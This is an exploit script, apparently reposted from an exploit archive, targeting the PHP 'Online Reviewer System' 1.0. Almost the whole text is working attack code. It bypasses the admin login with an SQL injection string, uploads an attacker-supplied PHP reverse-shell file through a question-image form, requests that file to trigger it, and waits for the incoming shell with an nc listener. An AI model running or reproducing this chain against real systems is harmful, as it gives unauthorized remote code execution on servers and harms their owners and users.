Share
## https://sploitus.com/exploit?id=PACKETSTORM:161219
#!/bin/bash  
# Exploit Title: Online Reviewer System (PHPPDO) - RCE & ADMIN BYPASS  
# Exploit Author: Richard Jones  
# Date: 2021-01-31  
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=12937&title=Online+Reviewer+System+Using+PHP%2FPDO+with+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
  
RS='\033[0m'  
R='\033[0;31m'  
G='\033[0;32m'  
LB='\033[1;34m'  
CY='\033[0;36m'  
W='\033[1;73m'  
  
printf "${G} ________ .__ .__ __________ .__ ${RS} \n"  
printf "${G} \_____ \ ____ | | |__| ____ ____\______ \ _______ _|__| ______ _ __ ${RS} \n"  
printf "${G} / | \ / \| | | |/ \_/ __ \| _// __ \ \/ / |/ __ \ \/ \/ / ${RS} \n"  
printf "${G} / | \ | \ |_| | | \ ___/| | \ ___/\ /| \ ___/\ / ${RS} \n"  
printf "${G} \_______ /___| /____/__|___| /\___ >____|_ /\___ >\_/ |__|\___ >\/\_/ ${RS} \n"  
printf "${G} \/ \/ \/ \/ \/ \/ \/ ${RS} \n"  
printf "${G} Created by: Ricard Jones ${RS}"  
  
if [ ${#@} -lt 3 ]; then  
echo -e "\nUsage: ./onlinereviewer web-ip reverse-shell-file rev-port"  
echo "Eg: ./onlinereviewer 10.10.10.10 shell.php rev-port"  
exit 1;  
fi  
  
COOKIES="cookies.txt"  
#login bypass  
echo -e "\n[+] Running login bypass and trying for reverse shell..."  
curl -c $COOKIES http://$1/reviewer/login/ -X POST -d "username=a%27+or+1%3D1--+-&password=a%27+or+1%3D1--+-&btn-login=Log+In" &>/dev/null  
printf "${G}[+] Logged in, Sending payload ${RS}"  
(sleep 3;curl -b $COOKIES "http://$1/reviewer/system/system/admins/assessments/databank/btn_functions.php?action=add" -X POST -F "difficulty_id=1" \  
-F "test_desc=CIVIL ENGINEERING" -F "test_subject=Mathematics, Surveying and Transportation Engineering" -F "description=a" -F "option_a=a" -F "option_b=a" \  
-F "option_c=a" -F "option_d=a" -F "answer=A" -F "personImage=@$2" -F "btnAddQuestion=Save" &>/dev/null) &  
BASENAME=$2  
FILENAME=${BASENAME##*/}  
echo $BASENAME  
(sleep 5; echo "[+] Calling shell, wait a few moments";sleep 6; curl -b $COOKIES "http://$1//reviewer/system/system/admins/assessments/databank/files/$FILENAME") &   
rm $COOKIES  
nc -lnvp $3